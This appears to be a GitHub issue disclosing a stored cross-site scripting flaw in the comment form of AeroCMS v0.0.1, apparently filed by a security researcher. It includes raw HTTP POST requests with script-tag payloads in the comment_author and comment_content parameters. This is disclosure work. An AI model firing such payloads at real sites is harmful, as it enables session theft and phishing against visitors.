Description:
I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.
"comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters and your request data will be
Description:
I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.
CMS Version:
v0.0.1
Affected URL:
http://127.0.0.1/AeroCMS/post.php
Steps to Reproduce:
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close
comment_author=test&comment_email=test@test.com&comment_content=test&create_comment=
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close
comment_author=test"><script>alert(111)</script>&comment_email=test@test.com&comment_content=test"><script>alert('XSS')</script>&create_comment=
Proof of Concept:
You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability.
Stored.XSS.on.AeroCMS.mp4
Impact:
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
The text was updated successfully, but these errors were encountered: